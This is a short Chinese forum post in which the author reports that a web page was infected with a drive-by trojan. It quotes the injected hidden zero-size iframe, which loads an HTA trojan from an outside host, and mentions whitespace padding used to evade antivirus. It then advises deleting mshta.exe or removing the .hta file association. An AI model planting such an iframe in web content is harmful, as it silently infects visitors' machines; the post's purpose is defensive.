让人挂马了,真是郁闷~
木马代码如下
CODE:[Copytoclipboard]
--------------------------------------------------------------------------------
<IFRAMEmarginWidth=0marginHeight=0src="http://www.cnbct.be/hack/joke.htm"frameBorder=0width=0scrolling=noheight=0></IFRAME>
是hta自动弹出的木马,
我查看他的木马页面里windows.htm里
代码内容加了一些空格,基本可以躲避过杀毒软件的查杀
对于没有对付木马经验的人,机器已经中标了...
身为黑基的人,我badwolf需要为黑基地人做点事~
好开始这里介绍1下用1个简单的方法彻底禁止他木马在你机器运行
看这个
C:/WINDOWS/system32/mshta.exe
这个是运行*.hta文件的exe文件
1是删除这个exe文件
或者进入注册表
搜索.hta然后把相对应的注册表导出
然后删除他
也就删除了*.hta扩展名文件与mshta.exe的注册表关联
所以当打开挂马页面,也只会下载个*.hta文件并不会运行
也就不会中木马了..
其他格式的木马也差不多例如*.wmf的也用同样方法。
